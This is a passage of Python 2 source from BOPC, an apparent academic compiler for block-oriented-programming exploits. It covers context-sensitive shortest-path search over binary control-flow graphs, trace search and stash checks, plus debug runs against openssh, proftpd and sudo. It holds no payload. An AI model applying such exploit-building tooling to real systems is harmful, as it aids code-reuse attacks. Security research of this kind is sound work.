#\n        # This is an important step as 'depths' for the same function can vary\n        # depending on the root and/or the current state of the algorithm.  As \n        # an example consider the  case where we have a set of functions whose\n        # call graph is fully connected (i.e., a very weird form of recursion).\n        # In this case the 'depth' of each function depends on the initial entry\n        # point.\n        # ---------------------------------------------------------------------\n        for n, _ in nx.get_edge_attributes(self.__G, 'depth').items():\n            del self.__G.edge[ n[0] ][ n[1] ]['depth']\n\n        for n, _ in nx.get_edge_attributes(self.__G, 'path').items():\n            del self.__G.edge[ n[0] ][ n[1] ]['path']\n\n\n        # ---------------------------------------------------------------------\n        # Find the shortest (context sensitive) path\n        # ---------------------------------------------------------------------        \n        paths = self.__dijkstra_variant(ADDR2NODE[spur], [ADDR2NODE[dst]], cur_uid, precall_stack)\n        length, path = paths[0]\n\n        if len(paths) != 1:                         # this should never happen\n            fatal('__spur_shortest_path() should work with a single path')\n\n        if length == INFINITY:                      # if path doesn't exist, abort\n            return ([], [-1], [])\n\n\n        # ---------------------------------------------------------------------\n        # Calculate the spur path lengths and the expanded spur paths\n        #\n        # pathlens[i] has the length of the shortest subpath \"path[:i]\"\n        # expaths[i] has the expanded shortest subpath \"path[:i]\"\n        # ---------------------------------------------------------------------\n        spurlen  = 0\n        expath   = [path[0]]\n        pathlens = [0]        \n        expaths  = [expath[:]]\n        \n\n        for u, v in to_edges(path):                 # for every edge on the path\n            # Edge (u,v) may not exists (due to indirect jumps). For instance:\n            #\n            #       .text:000000000040589F        call    xfree\n            #       .text:00000000004058A4 loc_4058A4:\n            #\n            #       .text:0000000000415260 xfree           proc near\n            #       .....\n            #       .text:000000000041526D        jmp     _free\n            #\n            #       .plt:00000000004034B0 _free           proc near\n            #       .plt:00000000004034B0        jmp     cs:off_621248\n            #            \n            # In that case, we simply increase length by 1\n            if not self.__G.has_edge(ADDR2NODE[u], ADDR2NODE[v]):\n                edge_data = { }                     # assign an empty dictionary\n            else:\n                edge_data = self.__G.edge[ ADDR2NODE[u] ][ ADDR2NODE[v] ]\n\n\n            # update spurlen (get depth edge if exists)\n            spurlen += edge_data.get('depth', 1)\n            pathlens.append( spurlen )\n\n            # update expanded paths. Append path (if exists) and the new node\n            # (it's important to use [:] to create a copy of expath)\n            expath += edge_data.get('path', []) + [v]\n            expaths.append(expath[:])\n\n\n        # The expanded path should have as many nodes as the total length\n        #\n        # However this is not always true, because the expanded path may not be so \"expanded\"\n        # The only problem with that, is that we my return the same path >1 times\n        #\n        #       if spurlen != len(expath) - 1:\n        #           fatal(\"Something is wrong with 'expath' in __spur_shortest_path()\")\n\n\n        # The last element of pathlens list is the total path length\n        if length != pathlens[-1]:          \n            # This may occur, when we have an unresolvable function (eval/sudo/sudo):\n            #\n            #       .text:000000000040F5A5         test    rbp, rbp\n            #       .text:000000000040F5A8         jz      short loc_40F5C6\n            #       .text:000000000040F5AA         xor     ebx, ebx\n            #       .text:000000000040F5AC         nop     dword ptr [rax+00h]\n            #       .text:000000000040F5B0\n            #       .text:000000000040F5B0 loc_40F5B0:\n            #       .text:000000000040F5B0         mov     rdx, r15\n            #       .text:000000000040F5B3         mov     rsi, r14\n            #       .text:000000000040F5B6         mov     edi, r13d\n            #       .text:000000000040F5B9         call    qword ptr [r12+rbx*8]\n            #       .text:000000000040F5BD         add     rbx, 1\n            #       .text:000000000040F5C1         cmp     rbx, rbp\n            #       .text:000000000040F5C4         jnz     short loc_40F5B0\n            #       .text:000000000040F5C6\n            #       .text:000000000040F5C6 loc_40F5C6:\n            #       .text:000000000040F5C6         mov     rbx, [rsp+38h+var_30]\n            #       .text:000000000040F5CB         mov     rbp, [rsp+38h+var_28]\n            #       .text:000000000040F5D0         mov     r12, [rsp+38h+var_20]\n            #       .text:000000000040F5D5         mov     r13, [rsp+38h+var_18]\n            #       .text:000000000040F5DA         mov     r14, [rsp+38h+var_10]\n            #       .text:000000000040F5DF         mov     r15, [rsp+38h+var_8]\n            #       .text:000000000040F5E4         add     rsp, 38h\n            #       .text:000000000040F5E8         retn\n            #\n            # Here, \"call qword ptr [r12+rbx*8]\" does not really go anywhere, however the distance\n            # from 0x40F5B0 to 0x40F5BD is 2. This happens when we visit a function with length <1.\n            #\n            #       fatal(\"Something is wrong with 'pathlens' in __spur_shortest_path()\")\n            pass\n\n        return (path, pathlens, expaths)            # return spur path\n\n\n\n    # ---------------------------------------------------------------------------------------------\n\n    ''' ======================================================================================= '''\n    '''                                     CLASS INTERFACE                                     '''\n    ''' ======================================================================================= '''\n\n    # ---------------------------------------------------------------------------------------------\n    # __init__(): Class constructor.\n    #\n    # :Arg graph: CFG to work on\n    #\n    def __init__( self, cfg, clobbering={ }, adj={ } ):\n        self.__G          = cfg.graph               # store arguments internally\n        self.__clobbering = { }                     # clobbering blocks\n\n\n        self.__radj = mk_reverse_adj(adj)           # build the reverse adjacency list\n\n        # build a suitable dictionary with clobbering blocks\n        for uid, addrs in clobbering.iteritems():\n            for addr in addrs:\n                self.__clobbering.setdefault(addr, []).append(uid)\n       \n\n        super(self.__class__, self).__init__(       # call parent class\n            self.__G, \n            self.__spur_shortest_path, \n            lambda node : ADDR2NODE[node]           # transform address index to \"node\" object \n        )\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # shortest_path(): Find the shortest path (with respect to CFG) from a single source to a\n    #       destination (destinations can be >1). This function is pretty much a wrapper for\n    #       __dijkstra_variant()\n    #\n    # :Arg src: Source node\n    # :Arg dst: Destination node(s)\n    # :Arg cur_uid: Current UID of the SPL statement\n    # :Ret: A list of tuples with the length and the path for each final node. If addresses are\n    #   not valid function returns an empty list.\n    #\n    def shortest_path( self, src, dst, cur_uid=-1 ):\n        if not isinstance(dst, int): single = 0\n        else: single = 1; dst = [dst]               # make single destination a list\n\n\n        try:\n            # sp = self.__bfs_variant(ADDR2NODE[src], [ADDR2NODE[d] for d in dst])\n            sp = self.__dijkstra_variant(ADDR2NODE[src], [ADDR2NODE[d] for d in dst], cur_uid)\n\n            return sp[0] if single else sp          # if there's 1 path, return a tuple\n\n        except KeyError as val:        \n            sp = [(INFINITY, [])]*len(dst)          # failure\n\n            warn(\"CFG does not have a basic block at address %s (decimal)\" % val )\n            return sp[0] if single else sp\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # shortest_loop(): Find the shortest loop (with respect to CFG) starting from a single source \n    #       The cycle is context sensitive, so we have to use __dijkstra_variant(). To find a loop,\n    #       all we have to do, is to find the shortest path from the source to all of its\n    #       predecessors and then add one more edge to create a cycle.\n    #\n    #       Here's a good a example of context sensitivity in cycles:\n    #\n    #           .text:0000000000404EDB         xor     ebx, ebx\n    #           .text:0000000000404EDD         nop     dword ptr [rax]\n    #           .text:0000000000404EE0\n    #           .text:0000000000404EE0 loc_404EE0:\n    #           .text:0000000000404EE0         mov     edi, ds:listen_socks[rbx*4] ; fd\n    #           .text:0000000000404EE7         call    _close\n    #           .text:0000000000404EEC         lea     eax, [rbx+1]\n    #           .text:0000000000404EEF i = rax                                 ; int\n    #           .text:0000000000404EEF         add     rbx, 1\n    #           .text:0000000000404EF3         cmp     cs:num_listen_socks, eax\n    #           .text:0000000000404EF9         jg      short loc_404EE0\n    #\n    #           .plt:0000000000403160 _close  proc near\n    #           .plt:0000000000403160         jmp     cs:off_6210A0\n    #\n    #       In the above code, there's a cycle: 404eec - 404ee0 - 403160 - 10000a0 - 404eec.\n    #       However, if we start searching from 0x403160, we will find no cycle, as we're in a\n    #       different context (we don't know where to return from 0x10000a0).\n    #\n    # :Arg src: Source node\n    # :Arg cur_uid: Current UID of the SPL statement\n    # :Ret: A tuple with the length and the actual cycle. If a cycle does not exists function \n    #       returns an empty list.\n    #\n    def shortest_loop( self, src, cur_uid=-1 ):\n        try:\n            # find all predecessor blocks\n            predecessors = [pred for pred in ADDR2NODE[src].predecessors]\n\n            # if there are no predecessors, there are no cycles ;)\n            if not predecessors: \n                return (INFINITY, [])\n\n\n            # find shortest path from source to all predecessors\n            sp = self.__dijkstra_variant(ADDR2NODE[src], predecessors, cur_uid)\n\n            # find the shortest among the shortest paths          \n            dists = [dist for dist, _ in sp]                  \n            idx   = dists.index(min(dists))         # index of the minimum\n\n\n            if sp[idx][0] == INFINITY:\n                cycle = (INFINITY, [])\n            else:\n                # add the predecessor edge to form a cycle\n                # TODO: check if the predecessor edge is in the same context\n                cycle = (sp[idx][0] + 1, sp[idx][1] + [src])\n\n\n            del sp                                  # we don't need you anymore\n\n            return cycle                            # return the shortest loop\n\n        except KeyError as val:        \n            warn(\"CFG does not have a basic block at address %s (decimal)\" % val )\n\n            return [(INFINITY, [])]                 # failure\n\n\n\n# -------------------------------------------------------------------------------------------------\n'''\nif __name__ == '__main__':                          # DEBUG ONLY\n    set_dbg_lvl( DBG_LVL_0 )\n\n\n    import angr\n    \n    project = angr.Project('eval/proftpd/proftpd', load_options={'auto_load_libs': False})    \n    CFG     = project.analyses.CFGFast()\n    CFG.normalize()\n\n    # create a quick mapping between addresses and nodes (basic blocks)\n    for node in CFG.graph.nodes():\n        ADDR2NODE[ node.addr ] = node\n\n\n    # create a quick mapping between basic block addresses and their corresponding functions\n    for _, func in CFG.functions.iteritems():\n        for addr in func.block_addrs:\n            ADDR2FUNC[ addr ] = func\n\n\n    p = _cfg_shortest_path(CFG)\n\n\n    paths = []\n\n\n    # avoid some node\n    # CFG.graph.node[ ADDR2NODE[0x4058A4] ]['clobbering'] = 1\n\n    # for ll, pp in p.shortest_path(0x405897, [0x40c8f0]):    \n    # for ll, pp in p.k_shortest_paths(0x40f5a5, 0x40f5c6, 0, PARAMETER_P): # sudo\n    # for ll, pp in p.k_shortest_paths(0x412c98, 0x40c8f0, 0, PARAMETER_P): # openssh\n    \n\n    #for ll, pp in p.k_shortest_paths(0x42acf0, 0x42ad5e, 0, 2): # openssh\n    for ll, pp in p.k_shortest_paths(0x406806, 0x42ad5e, 0, 10): # openssh\n\n    #for ll, pp in p.k_shortest_loops(0x4043f5, 0, PARAMETER_P):   # openssh\n        print '%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%'\n        print 'Path (%d): %s' % (ll, pretty_list(pp))\n\n        paths.append( (ll, pp) )\n\n    print 'Printing all paths:'\n    for ll, pp in paths:\n        print 'Path (%d): %s' % (ll, pretty_list(pp))\n\n\n    print '\\n\\n\\n******************************************************\\n\\n\\n'\n\n    for ll, pp in p.k_shortest_paths(0x42acf0, 0x42ad5e, 0, 10): # openssh\n    \n\n    #for ll, pp in p.k_shortest_loops(0x4043f5, 0, PARAMETER_P):   # openssh\n        print '%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%'\n        print 'Path (%d): %s' % (ll, pretty_list(pp))\n\n        paths.append( (ll, pp) )\n\n\n    print 'Printing all paths:'\n    for ll, pp in paths:\n        print 'Path (%d): %s' % (ll, pretty_list(pp))\n\n\n'''\n\n# TODO: FIX MEEEEE!!!!!!!!!!!!!\n# BAD LOOP (mod: 0, set: 2) 40b277 - 40b28f - 402a40 - 10003c0 - 40b299 - 40b2b6 - \n#                           40b2e5 - 40b2eb - 402a80 - 10003e0 - 40b277\n\n\n# -------------------------------------------------------------------------------------------------\n"
  },
  {
    "path": "source/search.py",
    "content": "#!/usr/bin/env python2\n# -------------------------------------------------------------------------------------------------\n#\n#    ,ggggggggggg,     _,gggggg,_      ,ggggggggggg,      ,gggg,  \n#   dP\"\"\"88\"\"\"\"\"\"Y8, ,d8P\"\"d8P\"Y8b,   dP\"\"\"88\"\"\"\"\"\"Y8,  ,88\"\"\"Y8b,\n#   Yb,  88      `8b,d8'   Y8   \"8b,dPYb,  88      `8b d8\"     `Y8\n#    `\"  88      ,8Pd8'    `Ybaaad88P' `\"  88      ,8Pd8'   8b  d8\n#        88aaaad8P\" 8P       `\"\"\"\"Y8       88aaaad8P\",8I    \"Y88P'\n#        88\"\"\"\"Y8ba 8b            d8       88\"\"\"\"\"   I8'          \n#        88      `8bY8,          ,8P       88        d8           \n#        88      ,8P`Y8,        ,8P'       88        Y8,          \n#        88_____,d8' `Y8b,,__,,d8P'        88        `Yba,,_____, \n#       88888888P\"     `\"Y8888P\"'          88          `\"Y8888888 \n#\n#   The Block Oriented Programming (BOP) Compiler - v2.1\n#\n#\n# Kyriakos Ispoglou (ispo) - ispo@purdue.edu\n# PURDUE University, Fall 2016-18\n# -------------------------------------------------------------------------------------------------\n#\n#\n# search.py:\n#\n# This module is the \"heart\" of BOPC. It implements the trace searching algorithm that looks\n# for a trace that uses several accepted blocks (and no clobbering blokcs) that successfully\n# reconstructs the execution of the SPL payload.\n#\n# -------------------------------------------------------------------------------------------------\nfrom coreutils import *\nimport map      as M\nimport path     as P\nimport delta    as D\nimport simulate as S\nimport output   as O\n\nimport math\n\n\n\n# -------------------------------------------------------------------------------------------------\n# search: This class searches for subsets of accepted blocks that could reconstruct the execution\n#   of the SPL payload.\n#\nclass search:\n    ''' ======================================================================================= '''\n    '''                                   INTERNAL FUNCTIONS                                    '''\n    ''' ======================================================================================= '''\n\n    # ---------------------------------------------------------------------------------------------\n    # __remove_goto: Remove goto statements. Goto are not real statements; that is they don't \n    #       require an accepted block to get executed. Therefore if they stay on the statement\n    #       list, we will have a lot of issues. Thus, the best solution is to remove them.\n    #       \n    # :Arg accepted: A dictionary with all accepted blocks\n    # :Arg adj: The adjacency list.\n    # :Ret: Function returns a tuple that has the updated adjacency list and another list with all\n    #       goto statements that should be removed.\n    #\n    def __remove_goto( self, accepted, adj ):\n        dbg_prnt(DBG_LVL_3, \"Removing goto statements...\")\n        \n        # Build the reverse adjacency list (r_adj)\n        r_adj = self.__mk_reverse_adjacency_list(adj)\n        rm    = []                                  # remove list\n\n\n        for stmt in self.__IR:                      # iterate over goto statements\n            if stmt['type'] == 'jump':               \n                rm.append(stmt['uid'])              # add statement to remove list\n\n                # fix every statement that points to the goto\n                for src in r_adj[ stmt['uid'] ]:\n\n                    # remove edges that point to the goto\n                    adj[src]  = filter(lambda x : x != stmt['uid'], adj[src])                    \n                    adj[src] += adj[stmt['uid']]    # add the bypass edge\n\n                    # if we have multiple gotos chained together, also fix the 'target' attribute\n                    if  self.__IR[ src ]['type'] == 'jump':\n                        self.__IR[ src ]['target'] = stmt['target']\n\n\n                del adj[ stmt['uid'] ]              # we don't need the goto anymore\n\n                # Now we have to update r_adj as well. The simplest way to do that, is to \n                # rebuild it from scratch (not efficient, but adj is pretty small)\n                r_adj = self.__mk_reverse_adjacency_list(adj)\n\n\n        # return the updated adjacency and the UIDs of the goto statements\n        return adj, rm\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __mk_adjacency_list(): This function builds the adjacency list between SPL statements. That\n    #       is, the adjacency list indicates the set of possible statements that can be executed\n    #       after i-th statement (statement i does not always go to i+1).\n    #\n    # :Arg stmt_l: A (shuffled) list with the UIDs of all SPL statements.\n    # :Ret: A dictionary that has an entry for each statement (except the last one) that shows the\n    #       next statements\n    #\n    def __mk_adjacency_list( self, stmt_l ):\n        # To simply this process, we make some observations first.\n        #   [1]. The first statement cannot be a conditional jump (it uses a register)\n        #   [2]. goto and conditional jumps are single groups\n        #   [3]. When a group has >1 statements, then i -> i+1 for each statement in the group\n\n        adj  = { }                                  # The adjacency list (dictionary)\n        prev = stmt_l[0]                            # get the first statement\n\n        for curr in stmt_l[1:]:                     # for each statement\n            # goto statements have a single target (probably not i+1)\n            if self.__IR[prev]['type'] == 'jump':\n                adj[prev] = [to_uid(self.__IR[prev]['target'])]\n                \n            # conditional jumps have two targets (the one is i+1)\n            elif self.__IR[prev]['type'] == 'cond':\n                # Taken branch always first\n                adj[prev] = [to_uid(self.__IR[prev]['target']), curr]\n\n            # every other statement have i+1 as target\n            else:\n                adj[prev] = [curr]\n\n            prev = curr                             # update previous statement and move on\n\n\n        # special case for the last statement: There's no next statement, unless it's a jump\n        if self.__IR[curr]['type'] in ['jump', 'cond']:\n            adj[curr] = [to_uid(self.__IR[ prev ]['target'])]\n            \n\n        dbg_arb(DBG_LVL_3, \"SPL statement adjacency list\", adj)\n\n        return adj                                  # return the adjacency list\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __mk_reverse_adjacency_list(): This function builds the reverse adjacency list between SPL\n    #       statements. That is, it actually reverses the edge direction\n    #\n    # :Arg adj: The adjacency list\n    # :Ret: A dictionary that has an entry for each statement (except the last one) that shows the\n    #       *previous* statements\n    #\n    def __mk_reverse_adjacency_list( self, adj ):\n        rev_adj = { }\n\n        for a, b in adj.iteritems():\n            for c in b:\n                rev_adj.setdefault(c, []).append(a)\n\n        return rev_adj\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __shuffle: Shuffle the statements. This function is a generator that every time returns the\n    #       SPL statements in a different order, so they can be executed out-of-order. The order\n    #       must preserve the execution flow, so statements have to be shuffled in groups.\n    #       \n    # :Arg accepted: A dictionary with all accepted blocks\n    # :Ret: Function is a generator, so each time a different permutation of the SPL payload is \n    #       returned. The permutation is an ordered list with the UIDs of the SPL statements.\n    #\n    def __shuffle( self, accepted ):\n        # -------------------------------------------------------------------------------\n        # kth_permutation(): This internal function returns the k-th permutation of a\n        #       given sequence of numbers.\n        #\n        # :Arg group: Group to work on\n        # :Arg k: The index of the k-th permutation\n        #\n        def kth_permutation( group, k ):\n            tmpgrp = list(group[:])                 # create a temporary copy of the group\n            shuff  = []                             # result            \n            fact   = math.factorial(len(group))     # find group's factorial            \n            k     %= fact                           # don't go beyonnd n!\n\n            while tmpgrp:\n                fact = fact / len(tmpgrp)           # n! /= n\n                what, k = k // fact, k % fact       # select element and update k\n                \n                # add element to shuffle list and remove it from temporary group\n                shuff.append( tmpgrp.pop(what) )\n\n            return shuff\n\n        # -------------------------------------------------------------------------------\n\n  \n        # ---------------------------------------------------------------------\n        # Initialize permutation struct according to statement groups\n        # ---------------------------------------------------------------------\n        permlist = []                               # permutation list\n        upper    = 1                                # total number of permutations\n\n        # iterate on statement groups. Statements in each group can be executed in any\n        # order without affecting the execution flow of the SPL program.\n        for group in self.__IR.itergroup():\n            G = sorted([stmt['uid'] for stmt in group if stmt['type'] != 'varset'])\n            \n            if G:                                   # discard empty groups\n                fact = math.factorial(len(G))         \n\n                # add group to the permutation list. Each element contains the group uids (G),\n                # the total number of permutations (n) and the current permutation (i).    \n                permlist.append( {'G':G, 'n':fact, 'i':1} )\n\n                upper *= fact                       # calculate upper bound of permutations\n\n\n        # update upper bound according to the configuration\n        if N_OUT_OF_ORDER_ATTEMPTS != -1 and upper > N_OUT_OF_ORDER_ATTEMPTS:\n            upper = N_OUT_OF_ORDER_ATTEMPTS\n\n\n        # return the first permutation. Simply merge all groups (G) from 'permlist'\n        yield [x for p in permlist for x in p['G']]\n\n\n        # ---------------------------------------------------------------------\n        # Calculate the remaining upper-1 permutations (1 at a time)\n        # ---------------------------------------------------------------------\n        # make a list of the permutations groups. E.g.: [[0], [8, 10, 12], [14], [16, 18]]\n        perm = [p['G'] for p in permlist]\n\n        for i in range(upper - 1):            \n            for j in range(len(permlist)):          # for each permutation group\n\n                # calculate the (i-th + 1) permutation (the next one) for the current group\n                perm[j] = kth_permutation(permlist[j]['G'], permlist[j]['i'])\n                \n                # check if we exhausted all permutations for that group\n                if  permlist[j]['i'] % permlist[j]['n'] != 0:\n                    permlist[j]['i'] += 1           # if not simply increment current index\n                    break                           # and don't move on the next group\n\n                permlist[j]['i'] += 1               # increment index and move on the next group\n                \n            yield [x for p in perm for x in p]      # return the next permutation (merge first)\n \n\n\n    # ---------------------------------------------------------------------------------------------\n    # __enum_tree(): TODO\n    #\n    # \n    # :Ret: If function returns 0, we have found a solution!\n    #\n    def __enum_tree( self, tree, simulation, path=[], prev_uid=-1, totpath=set()  ):\n\n        print 'TREE', tree\n        #return 0\n\n\n        # ---------------------------------------------------------------------\n        # If tree is empty we have reached a solution\n        # ---------------------------------------------------------------------\n        if not tree:\n            dbg_arb(DBG_LVL_2, 'Path simulated successfully: ', path)\n            \n\n            # Ok we have executed all statements (for one branch of the Hk) successfully.\n            # Execution has stopped at the beginning of the accepted block. For goto and\n            # return statements that's ok, but for regset, regmod, call and cond we have\n            # to execute the final block as well.\n\n            if self.__IR[prev_uid]['type'] not in ['jump', 'return'] or \\\n                 self.__IR[prev_uid]['type'] == 'return' and self.__IR[prev_uid]['target'] == -1:\n\n                dbg_prnt(DBG_LVL_2, \"Final statement is '%s', so we need to do one more step...\" % \n                                        self.__IR[prev_uid]['type'])\n\n                term = simulation.step(self.__IR[prev_uid])\n\n                if term == -1: return -1\n\n                self.__terminals += term\n\n            else: self.__terminals.append( path[-1][1] )\n\n\n            emph('Solution found!', DBG_LVL_1)\n            dbg_arb(DBG_LVL_2, 'Path so far', path)\n\n            # base case. Tree enumerated successfully\n            # if we reach this point we have a solution (a trace)\n\n            simulation.finalize()\n\n            self.__simstash.append(simulation) \n\n            # if you want to visualize things\n            #\n            # visualize('cfg_paths', entry=self.__ep,\n            #            options=VO_DRAW_CFG | VO_DRAW_CLOBBERING |\n            #            VO_DRAW_ACCEPTED | VO_DRAW_SE_PATHS, paths=allp)\n    \n            # self.__total_path.union(totpath)\n            for a in totpath:\n                self.__total_path.add(a)\n\n            X = []\n            for a,b,c in path:\n                X.append( (c, a) )\n\n            for a, b in to_edges(X):\n                self.__path.add((a,b))\n\n            # print 'TOTAL_PATH', totpath, self.__total_path\n            return 0\n            \n\n\n        # ---------------------------------------------------------------------\n        # Tree is not empty and next node is unique\n        # ---------------------------------------------------------------------\n        elif isinstance(tree[0], tuple):\n            uid, currb, nextb = tree[0]\n            \n            # TODO: If Hk is disconnected (due to dummy gotos) then\n            # a new state needs to be initialized\n            #\n            # or we can simply discard the state....\n            #\n            # So, in case of a gap, just throw an exception\n \n            print uid, self.__IR[uid], tree[0], self.__adj\n            print 'PATH', path, [p[2] for p in path] #, self.__adj[ uid ][0]\n\n            # if currb == nextb: step() && simu_edge(step().addr, nextb) (to go back)\n            loopback = False\n\n            #if currb == nextb and uid in self.__adj:# and self.__adj[ uid ][0] in [p[2] for p in path]:              \n\n            # tree[0] is a tuple so we are sure that  self.__adj[uid] has 1 element\n            if currb == nextb and uid in self.__adj and uid >= self.__adj[uid][0]:\n                error('Do a step first')\n                loopback = True\n\n\n            if nextb == -1:\n                nextb = currb                   # make target to be itself\n\n            if currb == -1:\n                subpath = []\n            else:\n                subpath = simulation.simulate_edge(currb, nextb, uid, loopback)\n                if subpath == None:\n                    return -1\n\n            for (a,b) in to_edges(subpath):\n                totpath.add((a,b))\n\n            # edge simulated. Move on the next one!\n            if self.__enum_tree(tree[1:], simulation, path+[(currb, nextb, uid)], uid, totpath) < 0:\n                return -1\n\n\n        # ---------------------------------------------------------------------\n        # Tree is not empty and next node is a branch (2 paths)\n        # ---------------------------------------------------------------------\n        elif isinstance(tree[0], list):\n            if len(tree[0]) != 2:\n                raise Exception('Conditionals with >2 jump targets are not supported.')\n\n            # fork state            \n            # print 'FORK', path\n            # print 'TREEFORK', tree\n\n            uid0, _, _ = tree[0][0][0]\n            uid1, _, _ = tree[0][1][0]\n\n            # print 'UID0', uid0\n            # print 'UID1', uid1\n\n            if uid0 != uid1 and self.__IR[uid0]['type'] != 'cond':\n                raise Exception('Invalid!!! WTF should not happen!')\n\n            \n            condreg = [real for virt, real in self.__regmap \\\n                            if virt == '__r%d' % self.__IR[uid0]['reg']][0]\n\n            try:\n                # create the simulation object\n                simulation_2 = simulation.clone(condreg)\n                pass  \n            except Exception:\n                dbg_prnt(DBG_LVL_2, \"Cannot create simulation object 2. Discard current Hk\")\n                return -1\n            \n            self.__sim_objs.append(simulation_2)\n\n            warn('------------------------------- FIRST---------------------------')\n\n            # propagate previous uid as we only process lists here\n            X = self.__enum_tree(tree[0][0], simulation,  path, prev_uid, totpath)\n\n            warn('------------------------------- SECOND ---------------------------')\n            print simulation_2.constraints()\n\n            if X < 0 or \\\n               self.__enum_tree(tree[0][1], simulation_2, path, prev_uid, totpath) < 0:\n                    return -1\n\n            warn('------------------------------- DONE ---------------------------')\n\n        # ---------------------------------------------------------------------\n        #\n        # ---------------------------------------------------------------------\n        else:\n            raise Exception('Malformed tree!')\n\n        return 0\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __consistent_stashes(): This function checks whether all stashes (i.e., valid solutions) are \n    #       consistent. This is meaningful when delta graph is not flat (i.e., there are >1 active\n    #       stashes)\n    #\n    # :Ret: If stashes are consistent, function returns True. Otherwise, it returns False.\n    #\n    def __consistent_stashes( self ):\n        if len(self.__simstash) < 2:\n            return True\n\n        dbg_prnt(DBG_LVL_1, 'Checking whether stashes are consistent ...')\n\n        for simu in self.__simstash:\n            print 'Simulation', simu, simu.constraints()\n\n            # ispo: you're fixed ;)\n            # error('__consistent_stashes says: fix me ispo!!!!!')\n\n\n        # check if inireg, mem, and ext are consistent\n        for i in range(len(self.__simstash)):\n            for j in range(i+1, len(self.__simstash)):\n\n                # check\n                sim_a = self.__simstash[i]\n                sim_b = self.__simstash[j]\n                \n\n                sim_a.update_globals()          # update global variables\n                sim_b.update_globals()\n\n                # self.__inireg[ reg ] = val\n                for a, b in sim_a.inireg.iteritems():\n                    if b == None:\n                        continue\n                    \n                    if sim_b.inireg[a] != None and sim_b.inireg[a] != b:\n                        \n                        warn(\"Inconsistent values (0x%x != 0x%x) for register '%s'\" % \n                                (b, sim_b.inireg[a], a))\n\n                        return False\n\n    \n                for a, b in sim_a.mem.iteritems():\n                    if not b:                       # skip unneeded memory writes\n                        continue\n\n\n                    # address is used in both stashes\n                    if a in sim_b.mem and sim_b.mem[a]: \n\n                        if not isinstance(b, tuple) or not isinstance(sim_b.mem[a], tuple):\n                            continue\n\n                        if b[0] != sim_b.mem[a][0]:\n                            \n                            warn(\"Inconsistent values (0x%x:%d != 0x%x:%d) for address '0x%x'\" % \n                                (b[0], b[1], sim_b.mem[a][0], sim_b.mem[a][1], a))\n\n                            # what if sizes are different?\n                            if b[1] != sim_b.mem[a][1]:\n                                fatal('Idk how to handle that!!!!!!!')\n                            \n                            return False\n\n\n                # self.__ext[ var ] = (addr, value)\n                for a, b in sim_a.ext.iteritems():\n                    \n\n                    if a.shallow_repr() in sim_b.ext and sim_b.ext[a.shallow_repr()] != b:\n                        warn(\"Inconsistent values (0x%x:%d != 0x%x:%d) for external input '%s'\" % \n                                (b, sim_b.ext[a][0], sim_b.ext[a][1], a[0], a[1]))\n\n                        return False\n\n        for a, b in sim_a.mem.iteritems():\n            print 'MEM A', hex(a), b\n\n        print '---------------------------------------------------------'\n        for a, b in sim_b.mem.iteritems():\n            print 'MEM B', hex(a), b\n\n        # Assume they're ok for now...\n        return True\n        \n\n\n    # ---------------------------------------------------------------------------------------------\n    # __mapping_callback(): This callback function is invoked every time that a register and a\n    #       variable mappings are found.\n    #\n    # :Arg regmap: The register mapping as a list of (virtual_register, real_register) tuples\n    # :Arg varmap: The variable mapping as a list of (name, value) tuples\n    # :Ret: A returned value of 0 causes the callback function to be invoked again with a different\n    #       mapping (it means that the current mapping wasn't suitable). When function returns -1,\n    #       the enumeration process halts and the callback function returns to the enum_mappings()\n    #       caller (this means that the current mapping ended up in a valid solution).\n    #\n    def __mapping_callback( self, regmap, varmap ):\n        self.__varmap = varmap                      # save current variable mapping\n        self.__regmap = regmap\n        self.__ctr   += 1                           # increment counter\n\n        #\n        # varmap = [('argv', '*<BV64 mem_7fffffffffef148_4056_64 + 0x68>'), \n        #          ('prog', '*<BV64 mem_7fffffffffef148_4056_64 + 0x30>')]\n        # self.__varmap = varmap\n        #\n        #\n        # for a, b in SYM2ADDR.iteritems():\n        #     print 'XXXX', a, hex(b)\n        #\n        # exit()\n        #\n        # regmap = [('__r0', 'r13'), ('__r1', 'rax')]\n        # varmap = [('array', '*<BV64 0x621bf0>')]\n        # self.__varmap = varmap\n        #\n        # regmap = [('__r0', 'rdi'), ('__r1', 'rsi')]\n        # varmap = [('array', 6851008L)]\n        # self.__varmap = varmap\n\n        \n        # if case that you want to apply a specific mapping, discard all others\n        # TODO: Replace < with != (?)\n        if self.__options['mapping-id'] != -1 and self.__ctr < self.__options['mapping-id']: \n            # dbg_prnt(DBG_LVL_1, \"Discard current mapping.\")\n            return 0\n\n\n        # ---------------------------------------------------------------------\n        # Pretty-print the register/variable mappings\n        # ---------------------------------------------------------------------\n        emph('Trying mapping #%s:' % bold(self.__ctr), DBG_LVL_1)\n\n        s = ['%s <-> %s' % (bolds(virt), bolds(real)) for virt, real in regmap]\n        emph('\\tRegisters: %s' % ' | '.join(s), DBG_LVL_1)\n\n\n        s = ['%s <-> %s' % (bolds(var), bolds(hex(val) if isinstance(val, long) else str(val))) \n                    for var, val in varmap]\n        emph('\\tVariables: %s' % ' | '.join(s), DBG_LVL_1)\n\n\n\n        # ---------------------------------------------------------------------\n        # Apply (any) filters to the current mapping (DEBUG)\n        # ---------------------------------------------------------------------\n\n        # if you want to enumerate mappings, don't move on\n        if self.__options['enum']:\n            return 0\n\n    \n        self.__options['#mappings'] += 1\n\n\n\n        # ---------------------------------------------------------------------\n        # Identify accepted and clobbering blocks\n        # ---------------------------------------------------------------------\n        '''\n        # We check this out on marking to be more efficient\n\n        if 'rsp' in [real for _, real in regmap]:   # make sure that 'rsp' is not used\n            fatal(\"A virtual register cannot be mapped to %s. Discard mapping...\" % bolds('rsp'))\n            return 0                                # try another mapping\n\n        if not MAKE_RBP_SYMBOLIC and 'rbp' in [real for _, real in regmap]:\n            fatal(\"A virtual register cannot be mapped to %s. Discard mapping...\" % bolds('rbp'))\n\n            return 0\n\n        '''\n\n\n        # given the current mapping, go back to the CFG and mark all accepted blocks\n        accblks, rsvp = self.__mark.mark_accepted(regmap, varmap)  \n        \n        # if there is (are) >= 1 